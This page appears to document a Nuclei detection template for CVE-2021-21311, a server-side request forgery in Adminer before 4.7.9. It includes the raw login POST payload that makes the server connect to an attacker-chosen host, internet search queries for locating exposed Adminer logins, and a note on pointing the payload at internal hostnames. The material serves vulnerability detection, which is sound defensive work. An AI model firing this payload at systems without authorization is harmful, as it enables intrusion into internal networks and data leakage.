Adminer <4.7.9 - Server-Side Request Forgery
ID: CVE-2021-21311
Severity: high
Author: Adam Crosser,pwnhxl
Tags: cve2021,cve,adminer,ssrf
Description
Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. The template below exercises this through the unauthenticated login form: it selects the bundled Elasticsearch driver (auth[driver]=elastic) and supplies an attacker-chosen auth[server], so the connection attempt is made by the Adminer host itself and its outcome is reflected in the login error message.
YAML Source
id: CVE-2021-21311

info:
  name: Adminer <4.7.9 - Server-Side Request Forgery
  author: Adam Crosser,pwnhxl
  severity: high
  description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage.
  remediation: Upgrade to version 4.7.9 or later.
  reference:
    - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
    - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
    - https://packagist.org/packages/vrana/adminer
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21311
    - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2021-21311
    cwe-id: CWE-918
    epss-score: 0.02092
    epss-percentile: 0.89083
    cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 6
    vendor: adminer
    product: adminer
    shodan-query:
      - title:"Login - Adminer"
      - cpe:"cpe:2.3:a:adminer:adminer"
      - http.title:"login - adminer"
    fofa-query:
      - app="Adminer" && body="4.7.8"
      - title="login - adminer"
      - app="adminer" && body="4.7.8"
    google-query: intitle:"login - adminer"
    hunter-query:
      - app.name="Adminer"&&web.body="4.7.8"
      - app.name="adminer"&&web.body="4.7.8"
  tags: cve2021,cve,adminer,ssrf

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}

    payloads:
      path:
        - "/index.php"
        - "/adminer.php"
        - "/adminer/adminer.php"
        - "/adminer/index.php"
        - "/_adminer.php"
        - "/_adminer/index.php"

    attack: batteringram
    stop-at-first-match: true
    redirects: true
    max-redirects: 1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>400 - Bad Request</title>"
          - "<title>400 - Bad Request</title>"
        condition: or

      - type: status
        status:
          - 403
# digest: 4b0a00483046022100bec6e1481b42e1a3b057e589e945d712b37d296722068388634fc354409ad7e602210093c64cfe91e82a4beb36cbecaa73bdaecd298ded75a9d7c8abeda9c53c45cbc6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template posts the elastic-driver login shown above to each of the six candidate Adminer paths (batteringram, one request per path, stopping at the first match) and reports the target as vulnerable when a response has status 403 and its body contains the reflected "<title>400 - Bad Request</title>". Run it against a target with:

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21311.yaml"

The match depends on the target being able to reach example.org from the server side. A host without outbound egress, or one serving Adminer at a path outside the payload list, can be vulnerable and still produce no match, so treat a negative result as inconclusive and confirm the installed version directly (4.7.8 and earlier are affected).
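As an added example (not code from the Adminer project or from the nuclei-templates repository), the following Python reproduces the template's logic offline so the check can be read and tested without a target: the form body the raw request sends, the six candidate paths, and the two matchers joined by matchers-condition: and, evaluated over constructed sample responses. Only the request fields, paths and matcher strings come from the template; the Response class, the sample bodies, the function names and the assumed behaviour of a patched host are assumptions for the demonstration.

```python
"""Offline re-implementation of the CVE-2021-21311 Nuclei template logic.

Added example, not code from the Adminer project or from nuclei-templates.
Only the request fields, candidate paths and matcher strings come from the
template; the Response class, sample bodies and function names are assumed.
"""
import secrets
import string
from dataclasses import dataclass
from typing import Dict, Optional
from urllib.parse import urlencode

# payloads.path from the template; attack: batteringram sends one request per entry
CANDIDATE_PATHS = [
    "/index.php",
    "/adminer.php",
    "/adminer/adminer.php",
    "/adminer/index.php",
    "/_adminer.php",
    "/_adminer/index.php",
]

# matcher 1 (type: word, part: body) and matcher 2 (type: status)
BODY_MARKERS = ["<title>400 - Bad Request</title>"]
EXPECTED_STATUS = 403


def rand_base(n: int) -> str:
    """Stand-in for nuclei's {{to_lower(rand_base(n))}}: n lowercase alphanumerics."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def build_probe_body(server: str = "example.org") -> str:
    """Form body of the template's POST.

    auth[server] is the host the server-side elastic driver connects to; that
    attacker-controlled destination is the SSRF. The template uses example.org
    so a match needs no knowledge of the target's internal network.
    """
    fields = {
        "auth[driver]": "elastic",
        "auth[server]": server,
        "auth[username]": rand_base(8),
        "auth[password]": rand_base(8),
        "auth[db]": rand_base(8),
    }
    # keep the brackets literal, as the template's raw body does (PHP accepts either form)
    return urlencode(fields, safe="[]")


def build_probe_request(host: str, path: str, server: str = "example.org") -> str:
    """Raw HTTP/1.1 request text equivalent to the template's raw block."""
    body = build_probe_body(server)
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


@dataclass
class Response:
    status: int
    body: str


def matches(resp: Response) -> bool:
    """Both matchers must hit (matchers-condition: and)."""
    word_hit = any(marker in resp.body for marker in BODY_MARKERS)  # condition: or
    status_hit = resp.status == EXPECTED_STATUS
    return word_hit and status_hit


def scan(responses: Dict[str, Response]) -> Optional[str]:
    """Walk the paths in template order; return the first match (stop-at-first-match)."""
    for path in CANDIDATE_PATHS:
        resp = responses.get(path)
        if resp is not None and matches(resp):
            return path
    return None


def sample_responses() -> Dict[str, Response]:
    """Constructed sample responses (not captured traffic) for the offline demo."""
    reflected = (
        "<!DOCTYPE html><title>Login - Adminer</title>"
        "<div class='error'>Unable to connect to example.org: "
        "<title>400 - Bad Request</title></div>"
    )
    return {
        "/index.php": Response(404, "Not Found"),
        # vulnerable: the remote server's page is reflected in the login error
        "/adminer.php": Response(403, reflected),
        # assumed patched behaviour: still 403 on failed login, but nothing reflected
        "/adminer/adminer.php": Response(403, "Invalid credentials."),
    }


if __name__ == "__main__":
    print(build_probe_request("adminer.example", "/adminer.php"))
    print("first match:", scan(sample_responses()))
```

Swapping the server argument of build_probe_body for an internal hostname is the pivot the advisory's impact statement describes; the detection logic stays the same, only the reflected content changes.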